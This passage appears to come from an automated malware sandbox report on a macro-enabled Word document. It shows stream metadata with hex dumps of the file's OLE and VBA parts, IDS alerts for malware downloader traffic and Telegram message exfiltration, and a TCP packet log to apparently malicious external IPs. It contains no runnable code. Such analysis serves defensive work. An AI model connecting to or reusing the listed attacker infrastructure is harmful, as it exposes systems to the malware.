                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                          General
                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:4096
                                                                                                                                          Entropy:0.4819396898767131
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N a d i n e D a n i e l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 74 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c8 00 00 00 06 00 00 00 d4 00 00 00 07 00 00 00 e0 00 00 00 08 00 00 00 f4 00 00 00 09 00 00 00 04 01 00 00
                                                                                                                                          Stream Path: 1Table, File Type: data, Stream Size: 7882
                                                                                                                                          General
                                                                                                                                          Stream Path:1Table
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:7882
                                                                                                                                          Entropy:5.884070235642364
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
                                                                                                                                          Data Raw:0a 06 13 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                                                                                          Stream Path: Data, File Type: data, Stream Size: 4618
                                                                                                                                          General
                                                                                                                                          Stream Path:Data
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:4618
                                                                                                                                          Entropy:4.726776485086767
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          Data ASCII:. . $ . . $ . I f . . . . ! v . . h . # v . . ^ . # v . . z . # v . . 7 . # v . . . . # v . . . # v . . 4 . : V . . . . . t . . . . . . ( . 6 . , . . . . 5 . . . . ^ . 5 . . . . z . 5 . . . . 7 . 5 . . . . . . 5 . . . . . 5 . . . . 4 . 9 . . . . / . . . . . . . . . . . / . . . . / . . . . / . . . . . . . . . . . 2 . . . . . . . 2 . . . . . l . 4 . . . . . . . B . . . . a . y t V . . . $ . . $ . I f . . . . ! v . . h . # v . . ^ . # v . . z . # v . . 7 . # v . . . . # v . . . # v . . 4 . : V . . . . . t . .
                                                                                                                                          Data Raw:ec 00 16 24 01 17 24 01 49 66 01 00 00 00 21 76 00 06 68 01 23 76 00 01 5e 02 23 76 01 02 7a 17 23 76 02 03 37 02 23 76 03 04 10 02 23 76 04 05 c1 04 23 76 05 06 34 05 3a 56 0b 00 07 94 f4 00 0a 74 00 00 a0 04 14 f6 03 14 28 15 36 01 2c d6 03 00 06 01 35 d6 05 00 01 03 5e 02 35 d6 05 01 02 03 7a 17 35 d6 05 02 03 03 37 02 35 d6 05 03 04 03 10 02 35 d6 05 04 05 03 c1 04 35 d6 05 05
                                                                                                                                          Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 370
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/PROJECT
                                                                                                                                          CLSID:
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Stream Size:370
                                                                                                                                          Entropy:5.26543622504816
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          Data ASCII:I D = " { C 6 A 9 1 9 D F - F D D F - 4 0 6 1 - B 5 0 E - B C 9 8 0 2 C B 6 D 9 D } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 5 2 7 1 7 C 2 2 9 5 9 2 D 5 9 2 D 5 9 2 D 5 9 2 D " . . D P B = " C 0 C 2 F 2 F 5 F 3 F 5 F 3 F 5 " . . G C = " 5 B 5 9 6 9 1 0 0 5 1 1 0 5 1 1 F A " . . . . [ H o s t E x t e n d e r I n f o ] . . & H
                                                                                                                                          Data Raw:49 44 3d 22 7b 43 36 41 39 31 39 44 46 2d 46 44 44 46 2d 34 30 36 31 2d 42 35 30 45 2d 42 43 39 38 30 32 43 42 36 44 39 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                          Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/PROJECTwm
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:41
                                                                                                                                          Entropy:3.0773844850752607
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                          Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                          Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2910
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:2910
                                                                                                                                          Entropy:4.3567255409849235
                                                                                                                                          Base64 Encoded:False
                                                                                                                                          Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                                                                                                                                          Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                          Stream Path: Macros/VBA/dir, File Type: VAX-order 68k Blit mpx/mux executable, Stream Size: 522
                                                                                                                                          General
                                                                                                                                          Stream Path:Macros/VBA/dir
                                                                                                                                          CLSID:
                                                                                                                                          File Type:VAX-order 68k Blit mpx/mux executable
                                                                                                                                          Stream Size:522
                                                                                                                                          Entropy:6.272080735145925
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . . i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * , \\ C . . . . m . . A ! O f f i c g O D . f . i . c g . .
                                                                                                                                          Data Raw:01 06 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 c8 d6 8d 69 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                                                                                          Stream Path: WordDocument, File Type: data, Stream Size: 17972
                                                                                                                                          General
                                                                                                                                          Stream Path:WordDocument
                                                                                                                                          CLSID:
                                                                                                                                          File Type:data
                                                                                                                                          Stream Size:17972
                                                                                                                                          Entropy:4.46180646482636
                                                                                                                                          Base64 Encoded:True
                                                                                                                                          Data ASCII:. Y . . . . . . . . . . . . . . . . . . . . H . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . 4 F . . 9 . \\ 9 . \\ . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U . . . . . . . U . . . . . . . U . . . . . . . U . . . . . . . U . . . . . . . . . . . . . . . . . . . i . . . . . . . i . . . . . . . i . . . 8 . . . . . . 4 . . . . . . . . . i . . . . . . . . . . 0 . .
                                                                                                                                          Data Raw:ec a5 c1 00 59 e0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 48 11 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 46 00 00 39 a3 0a 5c 39 a3 0a 5c 1d 09 00 00 00 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                                          Network Behavior

                                                                                                                                          Suricata IDS Alerts

                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                          2025-01-06T07:54:12.243144+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549723132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:14.133786+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549723132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:14.591406+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549730188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:15.515041+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549731132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:15.975264+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549733188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:16.930648+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549736132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:18.508728+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553584132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:22.115322+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553612188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:23.507981+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553624188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:23.990983+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553623132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:25.170046+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553623132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:25.736960+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553644188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:25.816325+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.553643149.154.167.220443TCP
                                                                                                                                          2025-01-06T07:54:26.967936+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553650132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:28.402962+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553662132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:29.896406+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553671132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:31.399524+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553681132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:31.412893+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553683132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:32.647270+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553694132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:32.866022+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553681132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:33.415581+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553705188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:33.990289+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553709132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:34.256624+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553711132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:34.638891+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553716188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:35.694139+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553724132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:36.240323+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.553731188.114.97.3443TCP
                                                                                                                                          2025-01-06T07:54:36.927393+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.553734149.154.167.220443TCP
                                                                                                                                          2025-01-06T07:54:37.084764+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.553738132.226.8.16980TCP
                                                                                                                                          2025-01-06T07:54:44.379776+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.553795149.154.167.220443TCP

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 6, 2025 07:54:02.014719963 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.019675016 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.019848108 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.020010948 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.024800062 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.539633989 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.539652109 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.539661884 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.539668083 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.539675951 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.539757013 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.578326941 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578353882 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578363895 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578382969 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.578433037 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.578506947 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578519106 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578531027 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578541994 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578552008 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.578574896 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.578664064 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.626348019 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626363039 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626370907 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626441956 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.626471996 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626483917 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626535892 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.626672983 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626738071 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.626820087 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626832008 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626844883 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.626878977 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.626902103 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.627007008 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.665112019 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665136099 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665146112 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665180922 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.665265083 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665307045 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.665311098 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665323973 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665335894 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665370941 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.665388107 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.665436029 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.666219950 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666230917 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666240931 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666292906 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.666601896 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666614056 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666625023 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666636944 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.666654110 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.666697979 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.712999105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713140011 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713150978 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713161945 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713196039 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.713248968 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.713279009 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713290930 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713309050 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713320971 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713331938 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713366032 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.713366032 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.713972092 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713984013 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.713995934 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714006901 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714034081 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.714041948 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714054108 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714078903 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.714078903 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.714951038 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714962959 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714973927 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714983940 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.714994907 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.715018988 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.715038061 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.751924992 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.751938105 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.751949072 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.751960993 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.751990080 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.752053022 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.752144098 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752156019 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752166986 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752199888 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.752208948 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752219915 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752230883 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752243042 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752253056 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752258062 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.752291918 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.752299070 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.752949953 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752962112 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.752973080 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.753009081 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.753030062 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.753042936 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.753053904 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.753072023 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.753087997 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.753123045 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.753123045 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.753195047 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.754014015 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754025936 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754036903 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754046917 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754059076 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754070044 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754076004 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.754081011 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754092932 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.754123926 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.754189014 CET4971080192.168.2.5147.124.216.113
                                                                                                                                          Jan 6, 2025 07:54:02.799916983 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.799942017 CET8049710147.124.216.113192.168.2.5
                                                                                                                                          Jan 6, 2025 07:54:02.799953938 CET8049710147.124.216.113192.168.2.5
